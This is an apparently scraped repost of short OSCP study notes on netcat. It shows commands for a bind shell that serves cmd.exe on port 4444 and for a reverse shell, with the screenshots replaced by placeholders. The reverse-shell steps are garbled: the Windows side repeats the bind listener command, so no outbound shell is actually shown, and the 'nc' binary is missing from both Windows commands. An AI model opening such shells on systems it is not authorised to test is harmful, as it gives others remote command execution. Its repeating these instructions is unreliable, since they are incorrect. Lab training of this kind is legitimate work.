OSCP Learning Notes - Netcat

Posted keepmoving1113

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了OSCP Learning Notes - Netcat相关的知识,希望对你有一定的参考价值。

Introduction to Netcat

  • Connecting va Listening
  • Bind Shells
    • Attacker connects to victim on listening port
  • Reverse Shells
    • Victim connects to attacker on listening port

Basic usage:

nc -nv IP Port

技术图片

技术图片

Bind Shell:

 1.On the Windows nc tool.

-nvlp 4444 -e cmd.exe

技术图片

2. On the Kali nc tool.

nc -nv 10.0.0.16 4444

技术图片

3.Result

技术图片

 Reverse Shells

1.On the Kali nc tool.

nc -nvlp 4444

技术图片

2.On the Windows nc tool.

-nvlp 4444 -e cmd.exe

技术图片

3. Result

技术图片

 

以上是关于OSCP Learning Notes - Netcat的主要内容,如果未能解决你的问题,请参考以下文章

OSCP Learning Notes - Buffer Overflows

OSCP Learning Notes - Exploit

OSCP Learning Notes - Enumeration

OSCP Learning Notes - Capstone

OSCP Learning Notes - Exploit

OSCP Learning Notes - Exploit